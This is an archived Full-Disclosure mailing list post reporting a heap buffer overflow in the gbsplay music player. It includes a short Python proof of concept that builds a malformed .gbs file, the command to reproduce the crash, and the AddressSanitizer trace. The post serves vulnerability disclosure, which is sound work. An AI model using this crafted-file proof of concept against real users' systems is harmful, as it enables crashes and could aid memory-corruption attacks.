| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-Gx1D+jymuXjeyV9N8Hv==Jh950mmPD7xfg5WAFeDOJ5UQ@mail.gmail.com>
Date: Sat, 13 Sep 2025 09:41:12 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] gbsplay 0.0.100-18 Heap Buffer Overflow in
update_status_on_subsong_change in gbsplay
A heap buffer overflow vulnerability exists in gbsplay 0.0.100-18-g50352f3
(latest development snapshot at the time of testing). When opening a
crafted GBS file with inconsistent subsong metadata, the function
update_status_on_subsong_change (gbs.c:501) reads past the bounds of a
heap-allocated structure. The bug is triggered during subsong status update
when the reported total_songs or subsong indices are malformed.
AddressSanitizer (ASan) reports an out-of-bounds read of size 8 just before
the allocated region.
An attacker can exploit this vulnerability by tricking a victim into
playing a malicious .gbs file. Depending on the environment, this may
result in Denial of Service (DoS) (application crash) or potentially
arbitrary code execution due to memory corruption.
*Impact*
- Immediate crash on crafted file.
- Attackers may influence heap layout and overflow conditions.
*Proof of Concept*
Create a minimal, malformed GBS file:
import struct, os
with open("crash.gbs", "wb") as f:
f.write(b"GBS" + bytes([1])) # Magic + version
f.write(bytes([1])) # total_songs = 1
f.write(bytes([1])) # starting_song = 1
f.write(struct.pack("<HHHH", 0x4000, 0x4010, 0x4020, 0xFFFE))
f.write(bytes([0, 0]))
f.write(b"PoC".ljust(32, b"\x00")*3)
f.write(b"\x00"*0x1000) # pad
ASAN_OPTIONS=abort_on_error=1,detect_leaks=0 \
UBSAN_OPTIONS=print_stacktrace=1 \
./gbsplay -o stdout seeds/minimal.gbs
*Observe crash:*
=================================================================
==690137==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x502000001308 at pc 0xaaaad32b29c4 bp 0xffffe6778f90 sp 0xffffe6778f88
READ of size 8 at 0x502000001308 thread T0
#0 0xaaaad32b29c0 in update_status_on_subsong_change
/root/gbsplay/gbs.c:501:54
#1 0xaaaad32b21f8 in gbs_configure /root/gbsplay/gbs.c:131:2
#2 0xaaaad32a5584 in common_init /root/gbsplay/player.c:610:2
#3 0xaaaad329e220 in main /root/gbsplay/gbsplay.c:226:8
#4 0xffffaac62290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#5 0xffffaac62374 in __libc_start_main csu/../csu/libc-start.c:360:3
#6 0xaaaad31bedec in _start (/root/gbsplay/gbsplay+0x3edec) (BuildId:
c8259c242d7a0acbf2dd69253dd04032772c13a3)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists